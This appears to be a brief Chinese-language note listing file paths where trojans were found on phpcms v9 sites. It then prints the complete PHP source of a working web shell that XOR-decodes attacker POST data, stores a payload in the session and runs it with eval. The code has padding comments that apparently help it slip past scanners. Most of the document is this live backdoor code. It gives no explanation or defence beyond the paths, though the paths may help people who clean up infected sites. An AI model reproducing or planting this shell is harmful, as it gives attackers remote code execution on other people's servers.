phpcms v9 部分木马文件存在位置
/languages/zh-cn/system.menu.lang.php
/phpcms/languages/zh-cn/dengce.lang.php
/phpcms/libs/functions/autoload/
/phpcms/libs/functions/autoload/video.func.php
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
/*
也不知道.....GGGGG
SDFASDF
FDFFSDF
*/
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
/*
也不知道.....
SDFASDF
FDFFSDF
*/
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
/*
也不知道.....GGGG
SDFASDF
FDFFSDF
*/
eval("".$payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}